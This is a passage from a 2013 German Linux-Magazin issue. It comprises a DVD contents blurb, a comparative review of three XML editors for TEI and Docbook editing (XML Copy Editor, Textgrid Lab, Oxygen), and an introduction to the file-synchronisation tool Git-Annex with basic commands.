der Google Compute Engine oder James
Bromberger zu Amazons Webservice
sprechen. Dazu gibt’s noch MySQL-Mastermind
Michael „Monty“ Widenius, der
sein Kind Maria DB vorstellt.
E-Book: Mehr als eine Insel
Von Christian Ullenboom stammt das für
DELUG-Leser kostenlose E-Book (Abbildung
2), ein richtiges Kultbuch: Die
Fortsetzung des Java-Klassikers „Java ist
auch eine Insel“ richtet sich vornehmlich
an Entwickler und vermittelt umfassendes
und kompetentes Praxiswissen zu
den vielen Bibliotheken und Technologien.
Am Beispiel konkreter Java-Projekte
zeigt der Autor Christian Ullenboom, was
Abbildung 1: Bdale Garbee bei seinem Vortrag zur Freedom Box.
der Entwickler wissen muss über Swing,
Netzwerk- und Grafikprogrammierung,
RMI und Webservices, Java Server Pages
und Servlets, Applets, JDBC, Reflection
und Annotationen, Logging und Monitoring,
Java Native Interface (JNI) und
vieles mehr. Gedruckt kostet das Werk
bei Galileo 50 Euro, DELUG-Käufer bekommen
es einfach so.
Als virtuelle Appliance liegt auf der DVD
Django, ein in Python geschriebenes Content
Management Framework fürs Web.
Es bringt einen objektrelationalen Mapper
für die Datenbanken MySQL, Oracle,
PostgreSQL und SQlite sowie Drittanbieter-Backends
für DB2 und SQL Server.
Die vorliegende virtuelle Maschine bietet
dem Admin ein komplett vorkonfiguriertes
Framework inklusive Datenbanken.
Software und Videos
Damit nicht genug: Zu den Tools aus
dem Titelthema „CMS“, der Bitparade
und den Tooltipps gesellen sich auf der
DVD auch noch die neuesten Versionen
der in diesem Linux-Magazin besprochenen
Softwaretools Git-Annex, Varnish,
Volatility und Open Nebula. n

Software
www.linux-magazin.de Bitparade 11/2013
52
Drei XML-Editoren im Test
Alles ausgezeichnet
Wer literarische Texte mit elektronischen Mitteln formal nachbearbeiten möchte, der setzt im Idealfall auf XML
und die Schemata der Text Encoding Initiative (TEI). Drei Editoren für den Linux-Desktop helfen dabei. Harald Jele
© Kjetil Kolbjornrud, 123RF.com
Die Extensible Markup Language zeichnet
Dokumente zum Austausch zwischen
Computersystemen aus, unabhängig von
Plattform und Implementation. Struktur
und Grammatik der XML-Dateien beschreibt
eine so genannte Dokumenttyp-
Definition (DTD). Ein weitverbreitetes
Dokumentenformat, das eine DTD sowohl
für SGML als auch für XML definiert,
ist Docbook [1]. Es kommt vor
allem bei technischen Dokumentationen
zum Einsatz, zum Beispiel im Linux Documentation
Project und bei den KDEund
Gnome-Handbüchern.
Ein anderes Dokumentenformat zum Kodieren
und Austauschen von Texten ist
TEI (siehe Kasten „Die Text Encoding
Initiative“). Vor allem Editionswissenschaftler
profitieren von den freien Standards.
Abbildung 1 zeigt den typischen
Ablauf im Editionsvorgang: Ein Benutzer
redigiert einen Text aufgrund einer analogen
oder digitalen Vorlage. Er setzt dazu
einen XML-Editor mit Templates und ei-
ner Vorschaufunktion ein. Mittels XSLT-
Stylesheets, die etwa die TEI zur Verfügung
stellt, ist es möglich, so bearbeitete
Texte in andere Formate wie HTML, PDF
oder Ähnliches umzuwandeln. Als Transformationsprozessor
kommt meist Saxon
[4] zum Einsatz.
Da in der Regel mehrere Anwender an
einem Projekt arbeiten, empfiehlt sich
eine Versionsverwaltung wie CVS, SVN
oder Git. Ein Redakteur oder Herausgeber
entnimmt ihr den letzten Stand und gibt
nach der Qualitätskontrolle das Dokument
über einen Publikationsserver frei.
Editionsprojekte nutzen dazu häufig Sade
[5] der Berlin-Brandenburgischen Akademie
der Wissenschaften oder XTF [6]
der California Digital Library. Das Kernstück
des Editionsprozesses bildet jedoch
der XML-Editor. Im Idealfall bietet er eine
Template-Verwaltung und integriert eine
Transformations- beziehungsweise Vorschaufunktion.
Dieser Artikel stellt drei XML-Editoren
mit Extrafeatures vor. Den Auftakt macht
der XML Copy Editor [7], der auch in den
Repositories der meisten Distributionen
zu finden ist. Das Textgrid Lab [8] ist
mehr als ein reiner Editor und vereint
zusätzliche Dienste und Werkzeuge unter
einer Arbeitsoberfläche. Als drittes
Die Text Encoding Initiative
Das TEI-Konsortium kümmert sich um den
Entwurf, die Entwicklung und die Verbreitung
von Standards zur elektronischen Speicherung
und zur Weiterverarbeitung von Texten; die
Standards sind offen und über die Webseite
zugänglich [2]. Die Mitglieder der Organisation
stammen vorwiegend aus dem akademischen
Bereich sowie aus Forschungseinrichtungen,
die sich mit Themen rund um die maschinelle
Verarbeitung von Dokumenten befassen. Der
Schwerpunkt liegt bei Texten aus den Geistes-,
Sozial- und Wirtschaftswissenschaften sowie
bei der Linguistik.
Die Erkenntnisse fließen kontinuierlich in die
Weiterentwicklung der Standards ein. Obwohl
dieses Wissen seit rund 20 Jahren vorhanden
und in den einschlägigen Kreisen bekannt ist,
ignorieren es viele Benutzer. Dass sie dabei
ganze Editionsprojekte unter Umständen in
eine Sackgasse manövrieren, nehmen sie in
Kauf. Ein möglicher Grund für dieses Verhalten
ist die Scheu vor der Arbeit mit XML-kodierten
Texten. Die meisten bevorzugen eine bekannte
Arbeitsoberfläche, wie sie gängige Textverarbeitungen
bieten.
Moderne XML-Editoren unterstützen den Anwender,
erlauben unterschiedliche Sichten auf
die Dokumente und enthalten viele Werkzeuge,
die das Bearbeiten erleichtern. Sie helfen dabei,
die Kodierung des Quelltextes nicht aus den
Augen zu verlieren. Mit Oxgarage [3] bietet
die Text Encoding Initiative sogar ein Tool, das
vorhandene Officedateien konvertiert.

Knoten enthält. Damit sind diese sofort
und ohne Umweg zugänglich, um sie zu
bearbeiten oder zu duplizieren. Schön
wäre eine weitere Anzeige aller im aktuellen
Kontext in Frage kommenden Tags.
Da der XML Copy Editor in der Lage ist,
TEI- und Docbook-Kodierungen zu validieren,
wäre eine entsprechende Darstellung
durchaus machbar.
In den Programmeinstellungen können
Anwender die Schriftarten und deren
Größe bestimmen sowie die Anzeige
von XML-Tags und ‐Attributen abschalten.
Das ist insbesondere dann hilfreich,
wenn ein umfangreiches Dokument geöffnet
ist und sich der Nutzer ganz auf
den Inhalt und nicht auf die Kodierung
konzentrieren möchte. Zudem erlaubt
das Programm als einziges im Test, Tags
zu sperren und sie somit vor versehentlichen
Modifikationen zu schützen. Die
Sperre aktiviert der XML Copy Editor automatisch,
wenn der Benutzer die Tags
ausblendet. Die Statusleiste am unteren
Rand verrät, ob die Tags gerade versteckt
und geblockt sind (Abbildung 3).
Bitparade 11/2013
Software
Abbildung 1: Beim Editionsprozess greifen viele Mechanismen ineinander. Hier sind beispielhaft der Ablauf
und das Zusammenspiel der Komponenten für literarische Werke dargestellt.
Programm im Bunde tritt der proprietäre
Oxygen XML Editor [9] an. Alle drei
Testkandidaten sollten vor allem unter
Beweis stellen, wie gut sie mit TEI-kodierten
Texten zusammenarbeiten. Der
Vollständigkeit halber schauten sich die
Tester auch an, wie es mit der Docbook-
Unterstützung aussieht.
E XML Copy Editor
Der erste Testkandidat steht unter der
GPL. Die Projektseite [7] bietet eine ausführbare
Datei für Windows-Systeme, ein
Paket für Ubuntu-Anwender sowie die
Quellen des Programms zum Download
an. Gängige Distributionen enthalten den
Editor in den Standardpaketquellen. Das
mit Ubuntu 13.04 ausgelieferte Paket ist
allerdings fehlerhaft. Die Tester legten daher
selbst Hand an und kompilierten das
Programm aus den Quellen. Sie folgten
dabei der Anleitung aus der mitgelieferten
Datei »INSTALL«. Im Test trat Version
1.2.0.9 vom Oktober 2012 an.
Nach dem Start präsentiert sich der XML
Copy Editor schlicht und aufgeräumt
(siehe Abbildung 2). Nur die wichtigsten
Editierfunktionen sind direkt zugänglich;
alle weiteren Features bringt
das Programm in den Menüs unter. Viele
Dinge sind zudem über Funktionstasten
erreichbar. Benutzer erkennen auf einen
Blick die Struktur der XML-Datei, denn
das Programm zeigt diese in einer Baumansicht
an. Zusammengehörige Teile
klappt ein Mausklick auf und wieder zu.
Der XML Copy Editor bietet so genanntes
Word Wrapping. Hat der Anwender es
aktiviert, bricht das Tool lange Zeilen in
der Anzeige um.
Am rechten Bildschirmrand befinden sich
jene Elemente, die der jeweils aktuelle
Wohlfühlbereich
Der XML Copy Editor schlägt sich gleichermaßen
gut bei TEI-kodierten Texten
wie bei Docbook-Dokumenten. Er
validiert die Dateien und prüft, ob sie
wohlgeformt und gültig sind. Er akzeptiert
externe DTD-Dateien (und lädt diese
gegebenenfalls nach) sowie interne DTD-
Regeln. Fehlermeldungen und Warnungen
öffnet er in einem eigenen Bereich
am unteren Rand (Abbildung 2).
Über das Menü blenden Benutzer zudem
eine Eingabezeile ein (»Command«)
und rufen von dort externe Programme
wie etwa Versionsverwaltungen, das
Transformationstool Saxon [4], einen
Webbrowser oder einen anderen Editor
auf. Über Checkboxen setzen sie ihr
Kommando ab, halten es an oder übergeben
mittels Variablen entsprechende
Argumente.
Innerhalb der geöffneten Dokumente
wendet das Tool Xpath-Ausdrücke an und
durchsucht Dateien anhand der XML-
Struktur. Außerdem dürfen Benutzer in
der Suchfunktion reguläre Ausdrücke zu
Abbildung 2: Der XML Copy Editor präsentiert sich in unaufdringlichem Design, sodass Anwender sich schnell
zurechtfinden. Optional erscheinen im unteren Bereich Meldungen und eine Eingabezeile.
www.linux-magazin.de
53

Software
www.linux-magazin.de Bitparade 11/2013
54
Abbildung 3: Benutzer dürfen Tags ausblenden und sperren. XML Copy Editor ist der einzige Testkandidat,
der diesen Schutz vor versehentlichen Änderungen bietet.
Hilfe nehmen. Leider steht das Feature
nicht zur Verfügung, wenn der Nutzer
»Suchen und Ersetzen« auswählt.
Im Test fiel ein praktisches Zusatzfeature
besonders angenehm auf. Wählt der Anwender
»Öffne großes Dokument«, so deaktiviert
das Programm die Möglichkeit,
Dokumententeile auf- und zuzuklappen.
Auch das Syntax Highlighting steht in diesem
Modus nicht zur Verfügung. Beides
erhöht die Performanz, denn der Editor
reagiert im Umgang mit umfangreichen
Texten deutlich schneller.
Der XML Copy Editor greift zur Transformation
in andere Formate wahlweise auf
ein externes oder ein eingebettetes XSL-
Stylesheet zurück. Über das Menü »XML«
definieren Anwender externe Dateien.
Interne sprechen sie über das Welt kugel-
Icon in der Werkzeugleiste an. Diese
komfortable und flexible Möglichkeit,
XSLT-Prozesse unterschiedlich anzusprechen,
bieten nur wenige Editoren – von
den Testkandidaten kann nur Oxygen das
Gleiche leisten.
E Textgrid Lab
Der Textgrid-Verbund [10] setzt sich zum
Ziel, eine virtuelle Forschungsumgebung
für Geistes- und Kulturwissenschaftler
sowie eine Plattform für digitale Editionsprojekte
zu schaffen. Die von Textgrid
entwickelte Software erlaubt es Nutzern,
alleine oder im Team an textbasierten
Forschungsdaten zu arbeiten.
Im Wesentlichen bietet der Verbund zwei
Komponenten an: Das Textgrid Repository
ist ein Archiv, das Wissenschaftler und
ihre Ergebnisse untereinander vernetzt,
und das Textgrid Lab [8] ist der Client,
der mehrere Dienste und Werkzeuge –
darunter den getesteten XML-Editor – unter
einer Oberfläche vereint. Alle über
den Verbund freigegebenen Texte stehen
automatisch unter einer Creative-Commons-Lizenz.
Textgrid Lab ist in Java implementiert
und steht für Linux, Windows und OS X
zur Verfügung. Die Homepage bietet im
Downloadbereich kompilierte Binaries für
32- und 64-Bit-Systeme an. Zudem stehen
die Quellen der hauptsächlich unter der
LGPL 3 veröffentlichten Software in einem
Subversion-Repository [11] bereit.
Auf dem Ubuntu-Testsystem verlangte
das Programm außerdem die Bibliothek
»libwebkitgtk«. Im Test trat Version 2.0.4
vom Juli 2013 an.
Über den Startbildschirm (siehe Abbildung
4) erreichen Benutzer die verschiedenen
Module des Clients. Die
»Suche« führt direkt ins Textgrid-System
und bietet Zugriff auf alle dort abgelegten
und indizierten Texte. Die »Projekt‐
& Benutzerverwaltung« unterstützt
bei umfangreichen Projekten. Hinter
»Text‐Image‐Link‐Editor« verbirgt sich
ein Tool zum Verknüpfen von Bild und
Text, und »Wörterbücher« erlaubt einen
direkten Zugang zum Trierer Wörterbuchnetz.
Texte, Bilder, Metadaten und
so weiter, die zusammengehören, können
Anwender über »Aggregationen« mit
Drag & Drop bearbeiten und verknüpfen.
Über den gleichnamigen Eintrag starten
sie den XML-Editor.
Textgrid Lab basiert auf der offenen Entwicklungsumgebung
Eclipse [12], was
den Vorteil hat, dass die Macher nicht jedes
Feature neu programmieren müssen,
sondern auf die Vielfalt der vorhandenen
Plugins zurückgreifen können. Die von
den Textgrid-Lab-Herstellern freigegebenen
Erweiterungen installieren Benutzer
komfortabel über den Marketplace nach.
Hier finden sie beispielsweise linguistische
Hilfswerkzeuge, Eingabehilfen für
Links oder eine Verbindung zum Publikationsserver
Sade [5].
Verteilte Ressourcen
Alle Benutzer, die bereits Erfahrung mit
Eclipse gesammelt haben, dürften sich in
Textgrid Lab schnell zurechtfinden. Erleichterung
für Einsteiger verschaffen die
vordefinierten Ansichten (Perspektiven
genannt), die für bestimmte Aufgaben
wichtige Werkzeuge versammeln und als
Unterfenster im GUI anordnen. Hat man
sich erst einmal an die geteilte Ansicht
und die Darstellung in Frames gewöhnt,
zeigt sich die Arbeitsumgebung von ihrer
besten Seite.
Textgrid Lab ist offensichtlich explizit für
XML-TEI konzipiert. Öffnet der Benutzer
eine Docbook-Datei mit der Endung
».docbook«, so reicht das Programm
diese zunächst an den Webbrowser weiter.
Um sie im integrierten XML-Editor
zu betrachten, ändern Nutzer entweder
in den Einstellungen die Dateizuordnungen
(Abteilung »Allgemein | Editoren«)
oder die Endung in ».xml«. Danach stellt
das Programm die Datei ordentlich dar,
erkennt auch die Strukturelemente und
lädt die DTD vollständig.
Geöffnete Dokumente in der XML-Editor-
Perspektive erscheinen in einem elegant
zurückhaltenden Fenstermodus (siehe
Abbildung 5). Über drei Frames erreichen
Benutzer die Gliederung (also die XML-

Abbildung 4: Über den Startbildschirm erreichen Benutzer alle Module des Textgrid Lab, darunter auch den
integrierten XML-Editor und den Marketplace zum Installieren von Erweiterungen.
Baumstruktur), den getaggten Inhalt des
Dokuments sowie die Eigenschaften und
Werte der aktuell ausgewählten Kategorie.
Ist der Bildschirm zu klein, schließt
ein beherzter Klick auf das Kreuz das
jeweilige Unterfenster und macht Platz
für andere Frames. Dieser Editor ist nicht
in der Lage, Tags zu sperren. Im Vorschaumodus
blendet Textgrid Lab sie
lediglich aus.
Leider stellt das Programm seinen vollen
Funktionsumfang nur zur Verfügung,
wenn sich der Anwender beim Textgrid-
System registriert und danach im Programm
anmeldet. Viele der Module sind
davon betroffen, etwa die Projekt- und Benutzerverwaltung,
Datei-Operationen wie
Speichern von Revisionen und die Gestaltung
eines eigenen Workflow. Der XML-
Editor steht auch ohne Login bereit.
Schade ist auch, dass die Entwickler viele
Eclipse-Plugins, die in der täglichen Arbeit
eine zentrale Rolle spielen, nicht
über den Marketplace freigegeben haben.
Dazu gehört die Integration einer
Versionsverwaltung, die grundsätzlich
in Eclipse bereitsteht, nur eben nicht in
Textgrid Lab.
Lädt der Benutzer über »Import« ein
Dokument zum Textgrid-Server hoch,
so überprüft die Software automatisch,
ob es wohlgeformt und valide ist. Nur
Dokumente, die beide Checks bestehen,
landen im Volltextindex und sind darüber
auffindbar. Alle anderen speichert das
System lediglich. Das Programm kann
auch die Docbook-Kodierung validieren,
erkennt vorhandene Fehler und zeigt
diese an. Als Grundlage nutzt es die geladene
DTD. Bei der Transformation greift
Textgrid Lab nur auf interne Stylesheets
zu und erkennt externe XSL-Dateien nicht
an. Eine Validierung ohne Einmischung
der Textgrid-Server fehlt ebenfalls.
E Oxygen XML Editor
Der letzte Testkandidat in dieser Runde
ist das einzige Tool, das unter einer proprietären
Lizenz steht. Einzelplatzlizenzen
für den Oxygen XML Editor [9] gibt
es bereits ab rund 100 US-Dollar für das
akademische Umfeld. Zusätzlich bietet
Bitparade 11/2013
Software
www.linux-magazin.de
55
Abbildung 5: Textgrid Lab teilt das Programmfenster in verschiedene Bereiche auf. Welche das sind, hängt von der gewählten Perspektive ab.

Software
www.linux-magazin.de Bitparade 11/2013
56
Abbildung 6: Oxygen XML Editor punktet mit einem integrierten SVN-Client, der als Eclipse-Plugin eingebunden ist.
der Hersteller Syncro Soft eine 30-tägige
Testlizenz an. Zum Download stehen 32-
und 64-Bit-Varianten für Linux, OS X und
Windows bereit, die auch eine Oracle/​
Sun-Java-VM (Version 1.7.0_15) enthalten.
Als Minimalvoraussetzungen nennen
die Macher 1 GByte RAM und 300 MByte
Festplattenplatz; empfohlen sind 2 GByte
RAM. Das Java-Programm arbeitet laut
Aussage der Entwickler nur mit der Java-
VM von Oracle/​Sun zusammen.
Die rumänische Softwareschmiede will
mit dem Oxygen XML Editor Anfänger
und fortgeschrittene Nutzer ansprechen.
Um diesen Spagat zu schaffen, integrieren
die Entwickler zahlreiche XML-Methoden
und ‐Technologien und platzieren
diese in einer geschickt gestalteten Menüund
Kontextmenü-Struktur. So sind die
Programmfunktionen schnell erreichbar,
ohne den Neuling mit einer überladenen
Oberfläche zu überfordern. Wer mit dem
Textgrid Lab vertraut ist, der findet einige
Bedienelemente wieder.
Auch vom Oxygen XML Editor existiert
neben der Stand-alone-Variante eine weitere
als Eclipse-Plugin, die somit vom
flexiblen Unterbau der Entwicklungsumgebung
profitiert. Anders als beim
zweiten Testkandidaten sind sämtliche
Eclipse-Erweiterungen bereits vorbildlich
eingebettet. Das gilt unter anderem für
den Umbruch überlanger Zeilen in der
Anzeige und eine Versionsverwaltung
(siehe Abbildung 6).
Raum zum Atmen
Im Bearbeitungsmodus ähnelt die Anzeige
der von Textgrid Lab (siehe Abbildung
7). Der Oxygen XML Editor teilt
die Oberfläche in mehrere Unterfenster
auf. Benutzer haben über die linke Seite
schnellen Zugriff auf ihre Projekte und
die Gliederung der Dokumente. Rechts
von der geöffneten XML-Datei listet das
Programm die Attribute auf und blendet
Transformationswerkzeuge ein. Anwender,
die ihre Arbeit zwischendurch in
einem Anzeigeformat wie HTML, PDF
oder E-Pub kontrollieren möchten, finden
dort entsprechende Stylesheets. Deren
Pfade müssen sie nicht ins Dokument
einbetten.
Der Editor bietet eine Baumansicht mit
der Möglichkeit, Tags ein- und auszuklappen.
Im Bearbeitungsmodus (»AUTOR«)
darf der Nutzer Tags ausblenden, aber
nicht sperren. Als einziger Kandidat im
Test interpretiert der Editor reguläre Ausdrücke
auch beim Suchen und Ersetzen.
Zudem dürfen Benutzer die Suche auf
XML-Elemente einschränken.
Abbildung 7: Das Programmfenster ist in mehrere Unterfenster aufgeteilt. Rechts blendet der Oxygen XML Editor unter anderem Transformationstools ein.

Die Vorgaben des TEI-Konsortiums hat
der Editor vorbildlich implementiert und
erkennt auch das Docbook-Format. Er
wählt einen Vorschaumodus, der dem
Style sheet entspricht, offeriert Funktionen,
die Validität und Wohlgeformtheit
überprüfen sowie einen eingebauten
Debugger. Auf formale Fehler weist das
Programm direkt beim Öffnen hin. Wirklich
praktisch ist, dass es Benutzern beim
Schachteln der XML-Tags unter die Arme
greift und Vorschläge macht.
Der Oxygen XML Editor enthält Verknüpfungen
zu gängigen XML-Datenbanken
und erlaubt so, die meisten Publikationsserver
anzubinden, die XML-TEIkodierte
Texte verarbeiten können. Alle
Projektverwaltungs-Vorgänge bildet er im
lokalen Dateisystem ab. Benutzer dürfen
mit eigenen Templates arbeiten und die
Vorlage jederzeit aus einer Liste aufrufen
und verwenden.
Der Editor integriert Methoden zur Weiterverarbeitung
von XML-Dokumenten.
Oxygen kann externe und interne Stylesheets
ansteuern. Neben XSLT unterstützt
die Software auch Xquery, Xpath und das
moderne Xproc. XML Processing ist eine
vom W3C standardisierte XML-Sprache,
die eine Stapelverarbeitung von XML-
Dokumenten über so genannte Pipelines
realisiert.
Hervorgehoben
Um eine XML-TEI-Arbeitsumgebung unter
Linux einzurichten, reichen eigentlich ein
einfacher Texteditor, ein Validierungstool,
gegebenenfalls eine Versionsverwaltung
und eine Projektmanagement-Software.
Komfortabler gestaltet sich das Ganze
mit dem XML Copy Editor, der mit seinen
variablen Anzeigemöglichkeiten, der
übersichtlichen Bedienung und dem Sperren
von Tags punktet. Xpath und XSLT-
Unterstützung, eine Suche mit regulären
Ausdrücken und ein integrierter Validator
runden das positive Bild ab. Verbesserungswürdig
ist nach den Erkenntnissen
der Tester die Zusammenarbeit mit externen
Programmen; eine Template-Verwaltung
wäre ein Gewinn.
Eine deutliche Steigerung des Komforts
bietet ein Baukastensystem wie das
Textgrid Lab. Das Programm kombiniert
den XML-Editor geschickt mit einer Projektverwaltung
und Möglichkeiten zum
Publizieren. Der Austausch mit anderen
Textgrid-Anwendern ist ein weiterer Bonuspunkt.
Zum vollständigen Glück fehlt
vor allem eine lokale Benutzer- und Projektverwaltung;
auch die fehlende Kooperation
mit externen XSL-Stylesheets ist
ein Defizit. Die Eclipse-Basis sorgt zwar
für hohe Flexibilität, leider machen sich
die Entwickler dies jedoch nicht zunutze,
da sie viele brauchbare Plugins im Marketplace
ausschließen.
Der Oxygen XML Editor ist das umfangreichste
Programm im Test. Wer sich
ernsthaft mit XML-TEI-kodierten Dokumenten
auseinandersetzen möchte, der
kommt auf Dauer an dieser ausgereiften
Anwendung kaum vorbei. Eine Open-
Source-Variante (notfalls ohne den vollen
Funktionsumfang) wäre schön, zumal
bereits viele freie Standards integriert
sind, die diesen Wunsch als gerechtfertigt
erscheinen lassen. (hej) n
Infos
[1] Docbook:
[http:// www. oasis-open. org/ docbook]
[2] TEI: [http:// www. tei‐c. org]
[3] Oxgarage:
[http:// www. tei‐c. org/ oxgarage]
[4] Saxon: [http:// www. saxonica. com]
[5] Sade (Scalable Architecture for Digital
Editions): [http:// www. bbaw. de/ telota/​
software/ sade]
[6] XFT: [http:// xtf. cdlib. org]
[7] XML Copy Editor:
[http:// xml‐copy‐editor. sourceforge. net]
[8] Textgrid Lab: [http:// www. textgridlab. org]
[9] Oxygen XML Editor:
[http:// www. oxygenxml. com]
[10] Forschungsverbund Textgrid:
[http:// www. textgrid. de]
[11] Subversion-Repository Textgrid Lab:
[https:// develop. sub. uni‐goettingen. de/​
repos/ textgrid]
[12] Wörterbuchnetz der Universität Trier:
[http:// woerterbuchnetz. de]
[13] Eclipse: [http:// www. eclipse. org]
Der Autor
Dr. Harald Jele ist Mitarbeiter
an der Universität
Klagenfurt und beschäftigt
sich zurzeit unter anderem
mit der Migration der
Klagenfurter Ausgabe der
Werke Robert Musils.

Software
www.linux-magazin.de Git-Annex 11/2013
58
Dateien verteilen und verwalten mit Git-Annex
Daten-Lagerist
Die Storagesoftware Git-Annex verteilt Dateien über Geräte, Server und Clouddienste. Dabei kann sie verschlüsseln,
hält alles synchron und weiß stets, welche Daten wo liegen. Mathias Huber
luciano de polo, 123RF
Wer in eine abgeschiedene Blockhütte
zieht, darf keinen Breitband-Internetanschluss
erwarten. Als der amerikanische
Debian-Entwickler Joey Hess 2010 in eine
solche Behausung zog, musste er sich
also etwas einfallen lassen, um seine Arbeit
mit der Wohnform zu versöhnen.
Den teuren Dialup-Anschluss warf er aus
Kostengründen nur einmal die Woche an
– aber er hatte doch eine Menge Server
mit einem Stapel an Festplatten zu synchronisieren.
Erfolgreiches Crowdfunding
Joey begann für seine Zwecke ein Synchronisationstool
zu schreiben, das als
Unterbau die freie Versionskontrollsoftware
Git verwendet. Was als Mittel für
den Hausgebrauch begann, ist nun als
Git-Annex [1] unter GPL allgemein verfügbar.
Mit einer Crowdfunding-Kampagne
konnte der Entwickler
das GUI Git-Annex-
Assistant programmieren,
das die Software für
Endanwender bedienbar
macht.
Joey Hess beschreibt die
beiden Zielgruppen der
Software auf der Git-
Annex-Homepage: Bob,
den Archivar, und Alice,
die Weltenbummlerin.
Der Archivar kann mit
dem Tool seine unzähligen
Dateien in einem
einzigen Verzeichnisbaum
verwalten, obwohl
sie auf mehrere Server
und sogar ausgesteckte
Wechselfestplatten verteilt
sind. Für alle Fälle
kann Git-Annex zur Sicherheit
auch mehrere Kopien von jeder
Datei anlegen.
Alice dagegen ist stets mit Netbook und
USB-Festplatte unterwegs, hat einen Webserver
sowie gemieteten Cloudspeicher.
Git-Annex hilft ihr dabei, unterwegs an
die richtigen Dateien zu kommen. Dazu
reicht eine WLAN-Verbindung im Café,
die Dateien beim Cloudanbieter legt sie
automatisch verschlüsselt ab.
Git plus Dateispeicher
In beiden Szenarien profitieren die Anwender
davon, dass Git Repositories
dezentral ablegen und abgleichen kann.
Das Versionskontrollsystem ist allerdings
zum Speichern vieler kleiner Quelltextdateien
gedacht, bei großen Videofiles
beispielsweise gibt es Performance- und
Platzprobleme. Joeys Kniff: Git-Annex
checkt nur die Metadaten zusammen mit
einem symbolischen Link in Git ein, die
Dateien bringt ein selbst geschriebenes
Speicher-Backend im Verzeichnis ».git/
annex/« unter.
Git-Annex liefert Kommandozeilentools
mit, die für technische Anwender rasch
zu erlernen sind, vor allem wenn sie Git
kennen. Die folgenden Befehle machen
das Verzeichnis »~/​annex« zu einem Git-
Annex-Repository namens »Mein PC«:
cd ~/annex
git init
git annex init "Mein PC"
Bevor der Anwender nun Dateien im Verzeichnis
ablegen kann, versetzt er es mit
»git annex direct« in den so genannten direkten
Modus. Nur in diesem darf er auf
die Dateien zugreifen [3]. Standardmäßig
befinden sich Repositories im Modus »indirect«.
Dann liegen alle Daten unterhalb
des versteckten ».git/«.
Wer seinem Dateispeicher ein weiteres
Repository hinzufügen will, etwa einen
USB-Stick, führt die Kommandos in
Listing 1 aus. Sie legen auf dem Stick
Installation
Da Git-Annex von einem Debian-Mitarbeiter
stammt, gibt es stets ein aktuelles Paket im
Unstable-Zweig (Sid). Für die stabile Debian-
Version oder andere Distributionen besteht
die einfachste Installationsmethode darin,
die vorkompilierten Binärarchive zu verwenden.
Der Entwickler bietet sie stets aktualisiert
unter [2] zum Download an. Nach dem
Entpacken muss man noch das entstandene
Verzeichnis, etwa »~/bin/git‐annex.linux/«,
seinem »PATH« hinzufügen.
Das Installieren der in Haskell geschriebenen
Software mit dem Paket-Tool Cabal bleibt geübten
Programmierern dieser Sprache vorbehalten:
Beim Test der Redaktion gab es nicht
erfüllte Abhängigkeiten.

Git-Annex 11/2013
Software
www.linux-magazin.de
59
Abbildung 1: Der Assistant merkt automatisch, wenn es lokal neue Dateien gibt,
und startet die Synchronisation mit den anderen Speicherorten.
Abbildung 2: Ein Server mit SSH-Daemon lässt sich rasch in ein entferntes
Repository mit Verschlüsselung verwandeln.
das Repository an und verknüpfen die
beiden Repositories: Jedes sieht das jeweils
andere als Remote Repository, mit
dem es sich abgleicht.
Wie man nun Dateien hinzufügt und
sie unter die Verwaltung von Git-Annex
stellt, zeigt Listing 2. Der Befehl »git
annex sync« veranlasst schließlich das
Synchronisieren der Daten.
Viel Zubehör
Zu dieser grundlegenden Bedienung,
die auf der Git-Annex-Homepage Schritt
für Schritt beschrieben ist [4], gibt es
zahlreiche Varianten und einiges Zubehör:
Als Repositories unterstützt das
Tool neben lokalen Verzeichnissen und
Wechselmedien auch entfernte Server,
sofern sie SSH-Zugriff bieten, Owncloud,
die Onlinedienste Google Drive, Amazon
S3, Box.com und Rsync.net. Für richtige
Archivare stehen auch der Offlinespeicher
Amazon Glacier und das öffentliche
Archive.org zur Verfügung.
Das Verschlüsseln erfolgt mit Gnu PG
und verläuft standardmäßig mit einem
automatisch lokal generierten Key. Auf
Wunsch kann der Benutzer sie aber auch
nach Gnu-PG-Sitte mit einem bestimmten
öffentlichen Schlüssel vornehmen.
Um die zunächst sehr technisch anmutende
Software für jedermann zugänglich
zu machen, schrieb Joey Hess den
Git-Annex-Assistant. Dieser verwendet
einen lokalen Webserver, um dem Anwender
eine zeitgemäße Weboberfläche
im Browser zu bieten. Dabei braucht er
auf keine Annehmlichkeit zu verzichten:
Über die Inotify-Schnittstelle des
Linux-Kernels merkt der Assistant zum
Beispiel, wenn sich Dateien geändert haben,
und stößt die Synchronisation an
(Abbildung 1). Schon beim Anlegen des
ersten Repository unterstützt das GUI
den User und versetzt es automatisch in
den »direct«-Modus. Auch das Einrichten
von Remote Repositories (Abbildung 2)
macht ein Webformular leicht.
Die umfangreiche Dokumentation auf
der Projekt-Homepage erklärt zahlreiche
Konfigurationsoptionen und gibt Empfehlungen
für einzelne Einsatzszenarien.
Beispielsweise kann man den einzelnen
Repositories bestimmte Rollen zuweisen
[5]: Ein »client« enthält die Dateien, auf
die der Benutzer bei seiner Arbeit zugreift,
»transfer« eignet sich für Server
oder Wechselmedien, die ausschließlich
zum Datenaustausch dienen, »backup«
dagegen bewahrt alles auf.
Trotzdem besteht Joey Hess darauf, dass
Git-Annex keine Backup-Software im
eigentlichen Sinne sei – sie besitze die
Backup-Features eher nebenbei. Mit geeigneten
Optionen kann man sogar dafür
sorgen, dass Git-Annex ausschließlich
MP3-Dateien unter 100 MByte auf den
Player schaufelt. In einem Screencast [6]
zeigt der Programmautor einige der Einstellungen
im Assistant.
Ausblick
Joey hat mittlerweile eine zweite Crowdfunding-Kampagne
[7] gestartet, die
ihm bereits vor dem Ende der Aktion
die Finanzierung für ein weiteres Jahr
Entwicklungsarbeit beschert hat. Ab September
2013 möchte er unter anderem
den begonnenen Windows-Port verbessern,
Verschlüsselung für entfernte Git-
Repositories umsetzen und zumindest für
bestimmte Situationen Disaster Recovery
im Assistant implementieren [8]. Daneben
dürfen auch die Sponsoren der Kampagne
ihre Wünsche äußern. n
Infos
[1] Git-Annex:
[http:// git‐annex. branchable. com]
[2] Installation:
[http:// git‐annex. branchable. com/ install/]
[3] Direct Mode: [http:// git‐annex. branchable.​
com/ direct_mode/]
[4] Walkthrough: [http:// git‐annex. branchable.​
com/ walkthrough/]
[5] Preferred Content: [http:// git‐annex.​
branchable. com/ preferred_content/]
[6] Archival Walkthrough:
[http:// git‐annex. branchable. com/​
assistant/ archival_walkthrough/]
[7] Zweite Crowdfunding-Kampagne:
[https:// campaign. joeyh. name]
[8] Roadmap: [http:// git‐annex. branchable.​
com/ design/ assistant/]
Listing 1: Remote hinzufügen
